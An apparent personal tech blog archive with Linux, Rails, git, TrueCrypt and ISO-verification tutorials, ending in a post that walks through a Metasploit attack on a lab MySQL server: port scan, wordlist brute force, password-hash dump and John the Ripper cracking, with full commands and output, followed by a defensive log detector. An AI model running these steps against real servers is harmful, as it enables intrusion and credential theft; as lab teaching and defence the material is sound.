Thursday, 19 January 2017

Add entry for Windows 7 in Grub2 in CentOS7



1) Add the following entry to /etc/grub.d/40_custom. Keep the file's existing header lines (#!/bin/sh and the exec tail line): grub2-mkconfig runs every file in /etc/grub.d as a script, and that header is what makes the file print the entries below it. (hd0,msdos1) is the first partition of the first disk; adjust it if the Windows system partition is somewhere else.
[root@block1 ~]# vi /etc/grub.d/40_custom

#!/bin/sh
exec tail -n +3 $0
# Custom menu entries go below this line.
menuentry "Microsoft Windows 7" {
    set root='(hd0,msdos1)'
    chainloader +1
}




2) Run the following command.
[root@block1 ~]# cd /boot/grub2
[root@block1 grub2]# grub2-mkconfig -o grub.cfg



3) Reboot the machine. You will now see an entry for Windows 7 in the GRUB menu.



Install the GRUB 2 bootloader using the CentOS 7 installation DVD




1) Boot the machine from the CentOS installation DVD.

2) On the first screen, select the option Troubleshooting.

3) On the next screen, select the option Rescue a CentOS system.

4) On the next screen, the rescue environment offers to find your Linux installation and mount it under /mnt/sysimage. Select the option Continue.

5) You will now get a shell prompt.

6) Type the following commands
 
chroot /mnt/sysimage

grub2-install /dev/sda

exit

exit


7) Remove the DVD and boot from the hard disk.



Friday, 22 April 2016

Verify the integrity of downloaded ISO files


You should always verify any ISO file you download. The file may have been maliciously modified by an attacker somewhere between the publisher and you, and a tampered image can install malware such as backdoors or keyloggers on your computer.

The publisher signs the ISO file with their private key, producing a detached digital signature file. Anyone holding the matching public key can use that signature file to verify the ISO.

A good signature shows that the file was signed by the holder of the private key, since nobody else has that key, and that the file has not been modified or tampered with in any way since it was signed.

1) Download the ISO file.

[shabbir@block1 Downloads]$ wget https://github.com/Security-Onion-Solutions/security-onion/releases/download/v14.04.4.1/securityonion-14.04.4.1.iso


2) Download the digital signature for the above downloaded ISO file.

[shabbir@block1 Downloads]$ wget https://github.com/Security-Onion-Solutions/security-onion/raw/master/securityonion-14.04.4.1.iso.sig


3) Download the public key.

[shabbir@block1 Downloads]$ wget https://raw.githubusercontent.com/Security-Onion-Solutions/security-onion/master/KEYS

4) Import the public key into your public keyring.
[shabbir@block1 Downloads]$ gpg --import KEYS

5) View your public keyring.
[shabbir@block1 Downloads]$ gpg2 --list-keys
/home/shabbir/.gnupg/pubring.gpg
--------------------------------
pub   4096R/ED6CF680 2012-06-29
uid                  Doug Burks <doug.burks@gmail.com>
sub   4096R/C5D9F4EB 2012-06-29


6) Verify the ISO file using the signature file. "Good signature" means the ISO matches a signature made by a key in your keyring; the WARNING below means gpg cannot tell whether that key really belongs to the project, and since the KEYS file was fetched from the same place as the ISO, neither can you. Compare the primary key fingerprint printed with the one the project publishes through an independent channel before trusting the download.
[shabbir@block1 Downloads]$ gpg --verify securityonion-14.04.4.1.iso.sig securityonion-14.04.4.1.iso
gpg: Signature made Sat 19 Mar 2016 05:32:50 PM IST using RSA key ID ED6CF680
gpg: Good signature from "Doug Burks <doug.burks@gmail.com>"

gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: BD56 2813 E345 A068 5FBB  91D3 788F 62F8 ED6C F680
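As an added example (written for this page, not part of the original post), the same verification scripted so that it fails closed: parse_status reads gpg's machine-readable --status-fd output and accepts the file only on a GOODSIG/VALIDSIG pair whose fingerprint equals one obtained out of band, so a good signature from some other key that found its way into the keyring is rejected; verify_iso runs gpg the way step 6 does and feeds its status lines to parse_status. The status texts below are constructed samples modelled on the run above.

```python
import os
import subprocess

# Fingerprint gpg printed in the post, spaces removed. Take this value from a
# channel independent of the download (project documentation, a signed
# announcement), not from the same GitHub repository that served the KEYS file.
EXPECTED_FPR = "BD562813E345A0685FBB91D3788F62F8ED6CF680"

# Status tags after which the file must not be accepted
FAIL_TAGS = {"BADSIG", "ERRSIG", "NO_PUBKEY", "EXPSIG", "EXPKEYSIG", "REVKEYSIG"}


def parse_status(status_text, expected_fpr):
    """Decide from 'gpg --status-fd' output whether a signed file is acceptable.

    gpg emits '[GNUPG:] GOODSIG <keyid> <uid>' when some key in the keyring
    made the signature and '[GNUPG:] VALIDSIG <fingerprint> ...' naming that
    key. 'Good signature' alone only proves that *a* key you imported signed
    the file; pinning the fingerprint is what ties the file to the publisher.
    Returns (accepted, reason).
    """
    good = False
    fingerprint = None
    for line in status_text.splitlines():
        if not line.startswith("[GNUPG:] "):
            continue
        fields = line.split()
        tag = fields[1]
        if tag in FAIL_TAGS:
            return False, tag
        if tag == "GOODSIG":
            good = True
        elif tag == "VALIDSIG" and len(fields) > 2:
            fingerprint = fields[2].upper()
    if not good or fingerprint is None:
        return False, "no valid signature"
    if fingerprint != expected_fpr.replace(" ", "").upper():
        return False, "fingerprint mismatch: " + fingerprint
    return True, fingerprint


def verify_iso(iso_path, sig_path, expected_fpr, gnupghome=None):
    """Run gpg on a detached signature (as in step 6) and judge its status lines."""
    cmd = ["gpg", "--batch", "--status-fd", "1", "--verify", sig_path, iso_path]
    env = dict(os.environ)
    if gnupghome:
        env["GNUPGHOME"] = gnupghome  # e.g. a keyring holding only the project's key
    proc = subprocess.run(cmd, capture_output=True, text=True, env=env)
    return parse_status(proc.stdout, expected_fpr)


# Constructed status output modelled on the successful verification in the post
SAMPLE_GOOD = """\
[GNUPG:] NEWSIG
[GNUPG:] GOODSIG 788F62F8ED6CF680 Doug Burks <doug.burks@gmail.com>
[GNUPG:] VALIDSIG BD562813E345A0685FBB91D3788F62F8ED6CF680 2016-03-19 1458388970 0 4 0 1 2 00 BD562813E345A0685FBB91D3788F62F8ED6CF680
[GNUPG:] TRUST_UNDEFINED 0 pgp
"""

# Constructed: the ISO was altered after signing, so the signature no longer matches
SAMPLE_BAD = """\
[GNUPG:] NEWSIG
[GNUPG:] BADSIG 788F62F8ED6CF680 Doug Burks <doug.burks@gmail.com>
"""

# Constructed: a good signature, but from some other key that ended up in the keyring
SAMPLE_WRONG_KEY = """\
[GNUPG:] NEWSIG
[GNUPG:] GOODSIG 0123456789ABCDEF Someone Else <else@example.invalid>
[GNUPG:] VALIDSIG 0000000000000000000000000123456789ABCDEF 2016-03-19 1458388970 0 4 0 1 2 00 0000000000000000000000000123456789ABCDEF
"""

if __name__ == "__main__":
    for name, text in (("good", SAMPLE_GOOD), ("tampered", SAMPLE_BAD), ("wrong key", SAMPLE_WRONG_KEY)):
        print(name, parse_status(text, EXPECTED_FPR))
```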




Wednesday, 20 April 2016

Creating Encrypted Volumes using TrueCrypt in Kali Linux

TrueCrypt is software for creating and maintaining on-the-fly encrypted volumes. On-the-fly encryption means data is encrypted automatically just before it is written to disk and decrypted just after it is read, without user intervention. Note that TrueCrypt's developers discontinued the project in 2014 and warned that it may contain unfixed security issues; its successor VeraCrypt follows the same workflow.

1) Open TrueCrypt.
root@kali:~# truecrypt

A GUI window will open.

2) Click on Create Volume.



3) Select the option Create an encrypted file container.

This option creates a container file holding encrypted files. Files of any type can be stored in it, and they are encrypted as long as they remain in the container.

4) Select the option Standard TrueCrypt volume.

5) Specify the location for the container. Here: /root/Desktop/try

6) Specify the encryption algorithm.

7) Select the size of the volume you want. The free space available is displayed below the size box.

8) Set the password for encryption.

9) Select the filesystem you want on the volume.

10) Select "I will mount the volume only on Linux".

11) Click on Format.

Mount the volume to create files and directories in it:

1) Select one of the slots in the list, then click Select File and choose the volume file.

2) Click on Mount to mount this volume.

3) Now access the volume from a terminal (or use the GUI).
root@kali:~# df
Filesystem             1K-blocks    Used Available Use% Mounted on
rootfs                  11459808 9637072   1217552  89% /
udev                       10240       0     10240   0% /dev
tmpfs                     102488     508    101980   1% /run
/dev/mapper/kali-root   11459808 9637072   1217552  89% /
tmpfs                       5120       0      5120   0% /run/lock
tmpfs                     204960      84    204876   1% /run/shm
/dev/sda1                 233191   26050    194700  12% /boot
/dev/mapper/truecrypt1     30356     430     27436   2% /media/truecrypt1

4) Change directory to /media/truecrypt1 and create files and directories.
root@kali:~# cd /media/truecrypt1/
root@kali:/media/truecrypt1# mkdir first
root@kali:/media/truecrypt1# cd first
root@kali:/media/truecrypt1/first# touch foo1

5) Unmount the volume using the terminal or the GUI.
   1) GUI: click on Dismount in TrueCrypt.
   2) Terminal: leave the mount point (for example cd /) and unmount truecrypt1. Note that umount alone detaches the filesystem but leaves the /dev/mapper/truecrypt1 mapping in place; truecrypt -d dismounts the volume completely.
root@kali:/# umount /media/truecrypt1



              

AJAX in Ruby On Rails: Sample Application


1) Create a new project and generate the model and controller.

[shabbir@neutron Aptana Studio 3 Workspace]$ rails new ajax1

[shabbir@neutron Aptana Studio 3 Workspace]$ cd ajax1/

[shabbir@neutron ajax1]$ rails generate model Task name:string 

[shabbir@neutron ajax1]$ rake db:migrate 

[shabbir@neutron ajax1]$ rails generate controller tasks index


2) routes.rb

  resources :tasks

  root 'tasks#index'



3) app/controllers/tasks_controller.rb

class TasksController < ApplicationController
  def index
    @tasks = Task.all
  end

  def new
    @task = Task.new
  end

  def create
    @task= Task.new(task_params)
    @task.save
   
    @tasks = Task.all
  end     

  def edit
    @task = Task.find(params[:id])
  end
 
  def update
    @task = Task.find(params[:id])
    @task.update(task_params)

    @tasks = Task.all
  end

  def destroy
    @task = Task.find(params[:id])
    @task.destroy

    @tasks = Task.all
  end
 
  private
  def task_params
    params.require(:task).permit(:name)
  end
end



4) Views

When the user clicks on the "New Task" link, an AJAX request is sent to the server because remote: true is set on the link.
index.html.erb

<div>
    <%= link_to "New Task" , new_task_path, id: "new_link", remote: true %>
</div>

<div id="task_form" style="display:none">
</div>

<h2> List All Tasks </h2>

<div id="tasks">
<%= render 'list' %>
</div>



When the user clicks on the "Edit" or "Delete" links, an AJAX request is sent to the server because remote: true is set on the links.
_list.html.erb

<table>
<tr>
    <th>Name</th><th colspan="3"></th>       
</tr>   

<% @tasks.each do |task| %>
    <tr>
        <td><%= task.name %> </td>
        <td><%= link_to 'Edit', edit_task_path(task), remote: true %></td>
        <td><%= link_to 'Delete', task, method: :delete, data: {confirm: 'Are you sure ?'}, remote: true %></td>
       
    </tr>
<% end %>
</table>






When the user submits the form, an AJAX request is sent to the server because remote: true is set on the form.
_form.html.erb

<%= form_for @task, remote: true do |f| %>

<%= f.label :name %>
<%= f.text_field :name %>

<%= f.submit "Save" %>
<% end %>



5) Javascript


When the user clicks on the "New Task" link, the "New Task" link is hidden and the form is rendered into the page. The j helper (escape_javascript) escapes quotes, newlines and closing tags in the rendered partial so that it can be safely embedded inside the JavaScript string literal.
new.js.erb

$("#new_link").hide();

$("#task_form").html("<%= j (render 'form') %>");

$("#task_form").slideDown();




After the Task is created, the "New Task" link is displayed, the form is hidden and the list of tasks is updated.

create.js.erb

$("#new_link").show();

$("#task_form").slideUp();

$("#tasks").html("<%= j (render('list')) %>" );





When the user clicks on the "Edit" link, the form is displayed and the "New Task" link is hidden.  

edit.js.erb

$("#new_link").hide();

$("#task_form").html("<%= j (render 'form') %>");

$("#task_form").slideDown();



After the Task is updated, the "New Task" link is displayed, the form is hidden and the list of tasks is updated.

update.js.erb
$("#new_link").show();

$("#task_form").slideUp();

$("#tasks").html("<%= j (render('list')) %>" );



When the user clicks on the "Delete" link, the task is destroyed and the list of tasks is updated.

destroy.js.erb
$("#tasks").html("<%= j (render('list')) %>" );


Tuesday, 3 November 2015

Version Control using git in CentOS7


Version control systems allow you to keep track of your software at the source level. You can track changes, revert to previous stages, and branch off from the base code to create alternative versions of files and directories.
One of the most popular version control systems is git. Many projects maintain their files in a Git repository, and sites like GitHub and Bitbucket have made sharing and contributing to code with Git easier than ever.
In this guide, we will demonstrate how to install Git on a CentOS 7 server.

1) Install git.

[shabbir@compute1 ~]$ sudo yum install git


2) Configure your name and email.

[shabbir@compute1 ~]$ git config --global user.name "shabbir rangwala"
[shabbir@compute1 ~]$ git config --global user.email "shabbir.ahr@gmail.com"

[shabbir@compute1 ~]$ git config --list
user.name=shabbir rangwala
user.email=shabbir.ahr@gmail.com


3) Create your workspace. Create a directory 'git' in your home directory, with a subdirectory for each project.

[shabbir@compute1 ~]$ mkdir -p ~/git/perl
[shabbir@compute1 ~]$ cd ~/git/perl


4) Copy your project files into this directory. Here we create a test file to use in the repository.

[shabbir@compute1 perl]$ touch test_file.pl


5) Tell git to use the current directory as a repository.

[shabbir@compute1 perl]$ git init
Initialized empty Git repository in /home/shabbir/git/perl/.git/


6) Add all files and directories to your newly created repository.

[shabbir@compute1 perl]$ git add .


7) Every time you add or change files, you need to commit with a message. Commit messages explain what your change did.

[shabbir@compute1 perl]$ git commit -m "Initial Commit" -a

The -a flag stages every tracked file that has been modified or deleted before committing. This is fine for the first commit, but generally you should name the individual files or directories you want to commit.

To commit an individual file:
[shabbir@compute1 perl]$ git commit -m "Initial Commit" test_file.pl

To add additional files or directories, you just add a space separated list to the end of that command.

8) Create an account on github.com and create a repository named 'perl'.


9) Configure the remote repository. The name is 'origin' and the URL is 'https://github.com/RShabbir53/perl.git'.

[shabbir@compute1 perl]$ git remote add origin https://github.com/RShabbir53/perl.git

[shabbir@compute1 perl]$ git remote -v
origin    https://github.com/RShabbir53/perl.git (fetch)
origin    https://github.com/RShabbir53/perl.git (push)



10) Push the code to the remote server. "git push" tells git to push our commits, "origin" is the name of the newly configured remote and "master" is the name of the first branch; "-u" records origin/master as the upstream of the local branch.

[shabbir@compute1 perl]$ git push -u origin master


11) In the future, when you have commits that you want to push to the server, you can simply type "git push".

Sunday, 1 November 2015

Install Ruby on Rails in CentOS7



1) Install prerequisites.

[shabbir@compute1~]$ sudo yum install -y git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel


2) Install rbenv. The git:// URLs in the commands below are unauthenticated (nothing verifies what the server sends) and GitHub no longer serves the git:// protocol, so use the https:// form of each URL instead.

[shabbir@compute1~]$ git clone git://github.com/sstephenson/rbenv.git .rbenv

[shabbir@compute1~]$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile

[shabbir@compute1~]$ echo 'eval "$(rbenv init -)"' >> ~/.bash_profile
  
[shabbir@compute1~]$ exec $SHELL
  
[shabbir@compute1~]$ git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
  
[shabbir@compute1~]$ echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile
  
[shabbir@compute1~]$ exec $SHELL

Reboot the machine.
[shabbir@compute1~]$ systemctl reboot



3) Install Ruby

[shabbir@compute1 ~]$ rbenv install -v 2.2.3

[shabbir@compute1 ~]$ rbenv global 2.2.3


Verify that Ruby was installed properly.
[shabbir@compute1 ~]$ ruby -v
ruby 2.2.3p173 (2015-08-18 revision 51636) [x86_64-linux]


[shabbir@compute1 ~]$ echo "gem: --no-document" > ~/.gemrc

[shabbir@compute1 ~]$ gem install bundler



4) Install Rails 

[shabbir@compute1 ~]$ gem install rails -v 4.2.4

[shabbir@compute1 ~]$ rbenv rehash 

Verify that Rails was installed properly.
[shabbir@compute1 ~]$ rails -v
Rails 4.2.4

 
 
5) Install JavaScript Runtime

Install EPEL Repository.
[shabbir@compute1 ~]$ sudo yum -y install epel-release


[shabbir@compute1 ~]$ sudo yum install nodejs



6) Install Database

[shabbir@compute1 ~]$ sudo yum groupinstall mariadb


[shabbir@compute1 ~]$ sudo yum install mariadb-devel

[shabbir@compute1 ~]$ sudo systemctl enable mariadb

[shabbir@compute1 ~]$ sudo systemctl start mariadb 

[shabbir@compute1 ~]$ gem install mysql

[shabbir@compute1 ~]$ rbenv rehash



7) Create 'Hello World' Application

7.1) Create Demo Project
[shabbir@compute1 ~]$ rails new demo


7.2) Start the Web Server.
[shabbir@compute1 ~]$ cd demo 

[shabbir@compute1 demo]$ rails server

7.3) Open a browser and go to http://localhost:3000.

NOTE: To stop the web server, press Ctrl+C in the terminal window where it is running.


7.4) Create a new controller called "welcome" with an action called "index".

[shabbir@compute1 demo]$ rails generate controller welcome index
      create  app/controllers/welcome_controller.rb
       route  get 'welcome/index'
      invoke  erb
      create    app/views/welcome
      create    app/views/welcome/index.html.erb
      invoke  test_unit
      create    test/controllers/welcome_controller_test.rb
      invoke  helper
      create    app/helpers/welcome_helper.rb
      invoke    test_unit
      invoke  assets
      invoke    coffee
      create      app/assets/javascripts/welcome.coffee
      invoke    scss
      create      app/assets/stylesheets/welcome.scss



The controller is located at app/controllers/welcome_controller.rb and the view at app/views/welcome/index.html.erb.


7.5) Edit the View.

[shabbir@compute1 demo]$ vi app/views/welcome/index.html.erb

<h1>Hello, World!</h1>



7.6) Now that we have made the controller and view, we need to tell Rails when we want "Hello, World!" to show up. In our case, we want it to show up when we navigate to the root URL of our site, http://localhost:3000. At the moment, "Welcome aboard" is occupying that spot.

Edit the application's routing file.
[shabbir@compute1 demo]$ vi config/routes.rb

Uncomment the following line
  root 'welcome#index'


7.7) Make sure the web server is still running, then open http://localhost:3000 in a browser again. The page now shows "Hello, World!".

 


Saturday, 27 June 2015

Hack MySQL Server in RHEL7 using Metasploit in Kali Linux


In this tutorial, we will hack MySQL Server running in RHEL 7 using Metasploit running in Kali Linux.

MySQL Server Name: meru.mycompany.com
MySQL Server IP Address: 192.168.122.1

Perform the following steps on the Kali Linux machine.

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

root@kali:~# msfconsole
msf >


2) Perform an nmap scan of the MySQL server.
msf > db_nmap -sV 192.168.122.1 -p 3306
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 10:03 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.00034s latency).
[*] Nmap: PORT     STATE SERVICE VERSION
[*] Nmap: 3306/tcp open  mysql   MySQL 5.5.35-MariaDB
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds


3) Perform a brute-force password attack.
msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port

   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt

msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

msf auxiliary(mysql_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_login) > set STOP_ON_SUCCESS  true
STOP_ON_SUCCESS => true

msf auxiliary(mysql_login) > run

[*] 192.168.122.1:3306 MYSQL - Found remote MySQL version 5.5.35
[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:iloveyou (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:admin (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[+] 192.168.122.1:3306 MYSQL - Success: 'root:root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


As seen above, we have cracked the login credentials for user 'root' with password 'root'.
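On the server side, every failed guess above produces an "Access denied" line in the MariaDB error log, provided log_warnings is 2 or higher (the enumeration further down reports login logging OFF on this host, so that is the first thing to fix). The following is an added example, not from the post: a small detector over constructed error-log lines that flags a source host once it accumulates too many failures, or too many distinct usernames, inside a time window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# MariaDB 5.5 error-log line written for a refused login when log_warnings >= 2.
# The day/hour field is space padded ("150627  9:05:01"), hence the {1,2} quantifiers.
LINE_RE = re.compile(
    r"^(?P<ts>\d{6} {1,2}\d{1,2}:\d{2}:\d{2}) \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'"
)


def parse_line(line):
    """Return (timestamp, user, source host) for an access-denied line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts").replace("  ", " "), "%y%m%d %H:%M:%S")
    return ts, m.group("user"), m.group("host")


def detect_bruteforce(lines, window_seconds=60, max_failures=5, max_users=3):
    """Flag source hosts whose failed logins look like the mysql_login run above.

    Two signals, either one is enough: many failures from one host inside the
    window, or one host cycling through several distinct usernames (a USER_FILE
    in play). Lines must be in log order. Each host is reported once, at the
    line that first crosses a threshold.
    """
    recent = defaultdict(deque)   # host -> (timestamp, user) pairs inside the window
    alerted = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue              # not an access-denied line (e.g. "[Note] ready for connections")
        ts, user, host = parsed
        q = recent[host]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()           # drop failures older than the window
        if host in alerted:
            continue
        users = sorted({u for _, u in q})
        if len(q) >= max_failures or len(users) >= max_users:
            alerted.add(host)
            alerts.append({"host": host, "failures": len(q), "users": users,
                           "at": ts.strftime("%Y-%m-%d %H:%M:%S")})
    return alerts


# Constructed error-log excerpt modelled on the wordlist attack shown above
SAMPLE_LOG = """\
150627 10:05:01 [Warning] Access denied for user 'anon'@'192.168.122.115' (using password: YES)
150627 10:05:01 [Warning] Access denied for user 'anon'@'192.168.122.115' (using password: YES)
150627 10:05:02 [Warning] Access denied for user 'anon'@'192.168.122.115' (using password: YES)
150627 10:05:02 [Warning] Access denied for user 'root'@'192.168.122.115' (using password: YES)
150627 10:05:03 [Warning] Access denied for user 'root'@'192.168.122.115' (using password: YES)
150627 10:05:03 [Warning] Access denied for user 'user'@'192.168.122.115' (using password: YES)
150627 10:05:04 [Warning] Access denied for user 'user'@'192.168.122.115' (using password: YES)
150627 10:09:30 [Warning] Access denied for user 'shabbir'@'192.168.122.50' (using password: YES)
150627 10:09:31 [Note] /usr/libexec/mysqld: ready for connections.
"""

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```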


4) Capture other users' credentials. We will capture the password hashes and then crack them using John the Ripper.

msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier

   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as


msf auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_hashdump) > set PASSWORD root
PASSWORD => root
msf auxiliary(mysql_hashdump) > run

[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[+] Saving HashString as Loot: user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] Saving HashString as Loot: anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



Open another terminal window and copy the password hashes to a file 'temp' as shown below.
root@kali:~# vi temp

root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C


Run John the Ripper to crack the hashes.

root@kali:~# john temp
Created directory: /root/.john
Loaded 9 password hashes with no different salts (MySQL 4.1 double-SHA-1 [128/128 SSE2 intrinsics 4x])
root             (root)
root             (root)
root             (root)
shabbir          (shabbir)
password         (user)
princess         (anon@localhost)
princess         (anon)
princess         (anon)


root@kali:~# john temp --show
root:root
root:root
root:root
shabbir:shabbir
user:password
anon@localhost:princess
anon:princess
anon:princess




5) Enumerate the MySQL server's configuration and accounts.

msf > use auxiliary/admin/mysql/mysql_enum 

msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to authenticate as

msf auxiliary(mysql_enum) > set RHOST 192.168.122.1
RHOST => 192.168.122.1

msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root

msf auxiliary(mysql_enum) > set PASSWORD root
PASSWORD => root

msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.35-MariaDB
[*]     Compiled for the following OS: Linux
[*]     Architecture: x86_64
[*]     Server Hostname: meru.mycompany.com
[*]     Data Directory: /var/lib/mysql/
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: DISABLED
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: 127.0.0.1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*]         User: root Host: ::1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[*]         User: shabbir Host: % Password Hash: *8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[*]         User: user Host: localhost Password Hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[*]         User: anon@localhost Host: % Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[*]         User: anon Host: localhost Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[*]         User: anon Host: 192.168.122.% Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[*]         User: root Host: % Password Hash: *01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts are not restricted by source:
[*]         User: anon@localhost Host: %
[*]         User: root Host: %
[*]         User: shabbir Host: %
[*] Auxiliary module execution completed
